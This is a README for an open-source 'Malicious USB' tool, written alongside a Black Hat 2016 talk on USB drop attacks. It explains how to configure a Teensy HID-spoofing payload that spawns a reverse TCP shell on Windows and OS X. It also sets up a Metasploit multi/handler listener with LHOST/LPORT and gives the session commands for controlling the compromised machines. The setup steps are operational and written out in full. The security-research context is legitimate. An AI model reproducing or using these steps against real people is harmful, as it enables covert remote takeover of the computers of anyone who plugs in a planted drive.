Malicious USB
LGPL-3.0 License
This code allows creation of a cross-platform HID spoofing payload that will spawn a reverse TCP-shell on Windows and OS X.
It was developed as part of the presentation I made at Blackhat USA 2016: Does Dropping USB drives in parking lots and other places really work? to show how to create realistic HID spoofing keys that can be used in USB key drop attack.
For more information on how to make realistic HID spoofing key see my blog post on the subject
To get the payload working you need:
If you want to conceal the Teensy into a realistic key follow the instruction locate in the last third of my blog post on the subject
The payload need to be configured to connect to the server of your choice. There is to way to do it:
That is the easy way and should work on most OSX and Linux or even Windows computers as long as Python is installed. To run it simply invoke:
cd payload
python configure_payload.py IP PORT
where IP is the IP of the server and PORT is the TCP port you want the connection back. Your configured payload is available in the file configured_payload.c.
If you don't have python, something went wrong or want to do it manually. Here is what you need to do:
cat payload | gzip -c | base64
Once the payload is configured, to get your Teensy up and running all you need to do is:
Congratulations, your Teensy is ready to go.
The server aspect requires to have a server that have a static IP that is reachable form Internet. We are going to use the generic Metasploit multi handler to control the reverse shell(s). Here is briefly how to do it, for more information please read the Metaploit documentation
use exploit/multi/handler
set payload osx/x64/shell_reverse_tcp
Despite the name, it will works for all OSset LHOST YOUR_IP
set LPORT YOUR_PORT
set ExitOnSession false
exploit -j -z
When a key is plugged you will see a log message indicating a new session is connected. You get the list of sessions by issuing the command:
sessions -l
To control a specific session:
sessions -i session_id